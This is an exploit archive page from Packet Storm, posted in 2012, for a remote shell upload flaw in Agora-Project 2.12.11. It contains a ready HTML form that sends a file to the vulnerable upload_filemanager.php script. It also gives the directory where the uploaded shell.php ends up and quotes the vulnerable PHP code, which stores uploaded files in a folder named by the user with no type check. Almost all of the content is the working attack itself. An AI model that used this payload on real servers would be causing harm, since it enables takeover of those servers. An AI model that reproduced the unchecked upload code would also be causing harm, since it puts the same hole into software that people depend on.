exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Agora-Project 2.12.11 Shell Upload

Agora-Project 2.12.11 Shell Upload
Posted Jun 10, 2012
Authored by Misa3l

Agora-Project version 2.12.11 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | a47c11c21f9ff1ff2eb775038f1babb2235fdf3d4e763f90a005b50faf62d5d5

Agora-Project 2.12.11 Shell Upload

Change Mirror Download
# Exploit Title: agora-project_2.12.11_12-2011 Remote Shell Upload
# Google Dork: n0 N0obs
# Date: 10/06/2012
# Exploit Author: Misa3l
# Vendor Homepage: http://sourceforge.net/projects/agora-project/
# Software Link: http://sourceforge.net/projects/agora-project/files/latest/download
# Version: 2.12.11_12-2011
# Tested on: Debian 6.0

Description

Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc.

Exploit

**********************************************************************************

<form action="http://127.0.0.1/labs/module_fichier/upload/upload_filemanager.php?dossierup=testing" ENCTYPE="multipart/form-data" method="post">
<input type="file" name="dossierup" />
<input type="submit" name="sube" />
</form>

**********************************************************************************

Dir Shell:
http://127.0.0.1/labs/stock_fichiers/tmp/
"testing" <--- folder
"shell.php" <--- shell
File Vul:
module_fichier/upload/upload_filemanager.php

<?php
//// INIT
define("ROOT_PATH","../../");
require_once ROOT_PATH."includes/global.inc.php";

//// AJOUTE LES FICHIERS UPLOADES AVEC PLUPLOAD DANS UN DOSSIER TEMPORAIRE
////
if(@$_GET["dossierup"]!="" && isset($_FILES) && count($_FILES)>0)
{
//// DOSSIER TEMPORAIRE (Cr�� si inexistant + chmod (car s'il est pass� dans mkdir() �a marche pas!))
$save_path = PATH_TMP.$_GET["dossierup"];
if(is_dir($save_path)==false) { mkdir($save_path); chmod($save_path, 0775); }

//// PLACE LE/LES FICHIERS
foreach($_FILES as $file_tmp)
{
if($file_tmp["error"]==0 && is_writable($save_path)) { move_uploaded_file($file_tmp["tmp_name"], $save_path."/".$file_tmp["name"]); }
elseif($num_erreur==4) { echo "UPLOAD_ERR_NO_FILE"; }
else { echo $trad["MSG_ALERTE_taille_fichier"]; }
}
}
?>

***************************************************************************************
End... Misa3l From Venezuela

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close